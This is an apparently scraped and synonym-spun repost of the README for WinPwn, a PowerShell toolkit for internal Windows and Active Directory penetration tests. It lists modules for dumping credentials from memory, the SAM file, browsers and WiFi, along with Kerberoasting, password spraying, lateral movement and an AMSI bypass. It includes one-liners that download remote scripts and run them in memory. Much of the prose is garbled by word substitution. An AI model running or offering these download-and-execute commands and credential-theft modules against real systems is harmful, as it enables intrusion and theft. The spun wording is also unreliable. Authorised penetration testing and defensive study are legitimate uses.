WinPwn – Automation For Internal Windows Penetrationtest / AD-Security

In many previous inside penetration assessments I continuously had issues of the present Powershell Recon / Exploitation scripts because of lacking proxy give a boost to. I continuously ran the similar scripts one after the opposite to get details about the present gadget and/or the area. To automate as many inside penetrationtest processes (reconnaissance in addition to exploitation) and for the proxy explanation why I wrote my very own script with computerized proxy recognition and integration. The script is most commonly in accordance with well known huge different offensive safety Powershell initiatives. They are loaded into RAM by way of IEX Downloadstring.
Any ideas, comments, Pull requests and feedback are welcome!
Just Import the Modules with: Import-Module .WinPwn.ps1 or iex (new-object web.webclient).downloadstring('')
For AMSI Bypass use the next oneliner: iex (new-object web.webclient).downloadstring('')
If you end up caught on a home windows gadget and not using a web entry – no downside in any respect, simply use Offline_Winpwn.ps1, all scripts and executables are integrated.
Invoke-Mimikatz model

  • Safetykatz in reminiscence
  • Dump lsass the usage of rundll32 methodology
  • Download and run Lazagne
  • Dump Browser credentials
  • Extract juicy informations from reminiscence
  • Exfiltrate Wifi-Credentials
  • Dump SAM-File NTLM Hashes
  • localreconmodules ->

    • Collect put in instrument, inclined instrument, Shares, community data, teams, privileges and plenty of extra
    • Check conventional vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP
    • Checks the Powershell tournament logs for credentials or different delicate informations
    • Search for passwords within the registry and at the report gadget
    • Find delicate information (config information, RDP information, keepass Databases)
    • Search for .NET Binaries at the native gadget
    • Optional: Get-Computerdetails (Powersploit) and PSRecon
  • domainreconmodules ->

    • Collect more than a few area informations for handbook overview
    • Find AD-Passwords in description fields
    • Search for attainable delicate area proportion information
    • ACLAnalysis
    • Unconstrained delegation methods/customers are enumerated
    • MS17-10 Scanner for area methods
    • SQL Server discovery and Auditing purposes (default credentials, passwords within the database and extra)
    • MS-RPRN Check for Domaincontrollers
    • Group Policy Audit with Grouper2
    • An AD-Report is generated in CSV Files (or XLS if excel is put in) with ADRecon.
  • Privescmodules -> Executes other privesc scripts in reminiscence (PowerUp Allchecks, Sherlock, GPPPasswords)
  • latmov -> Searches for Systems with Admin-Access within the area for lateral motion. Mass-Mimikatz can be utilized after for the discovered methods
  • shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)
  • groupsearch -> Get-DomainGPOUserLocalGroupMapping – in finding Systems the place you may have Admin-access or RDP entry to by way of Group Policy Mapping (Powerview / Powersploit)
  • Kerberoasting -> Executes Invoke-Kerberoast in a brand new window and retail outlets the hashes for later cracking
  • powerSQL -> SQL Server discovery, Check entry with present person, Audit for default credentials + UNCPath Injection Attacks
  • Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB
  • adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record
  • MS17-10 -> Scan energetic home windows Servers within the area or all methods for MS17-10 (Eternalblue) vulnerability
  • Sharpcradle -> Load C# Files from a far flung Webserver to RAM
  • DomainPassSpray -> DomainPasswordSpray Attacks, one password for all area customers
  • TO-DO

    • Some obfuskation
    • More obfuscation
    • Proxy by way of PAC-File give a boost to
    • Get the scripts from my very own creds repository ( to be unbiased from adjustments within the authentic repositories
    • More Recon/Exploitation purposes
    • Add MS17-10 Scanner
    • Add menu for higher dealing with of purposes
    • Amsi Bypass
    • Mailsniper integration
    • Azure Checks / Modules integration


    • Kevin-Robertson – Inveigh, Powermad, Invoke-TheHash
    • Arvanaghi – SessionGopher
    • PowerShellMafia – Powersploit
    • Dionach – PassHunt
    • A-mIn3 – WINSpect
    • 411Hall – JAWS
    • sense-of-security – ADrecon
    • dafthack – DomainPasswordSpray
    • rasta-mouse – Sherlock
    • AlessandroZ – LaZagne
    • samratashok – nishang
    • leechristensen – Random Repo
    • HarmJ0y – Many just right Blogposts, Gists and Scripts
    • NETSPI – PowerUpSQL
    • Cn33liz – p0wnedShell
    • rasta-mouse – AmsiScanBufferBypass
    • l0ss – Grouper2
    • dafthack – DomainPasswordSpray
    • enjoiz – PrivEsc
    Download WinPwn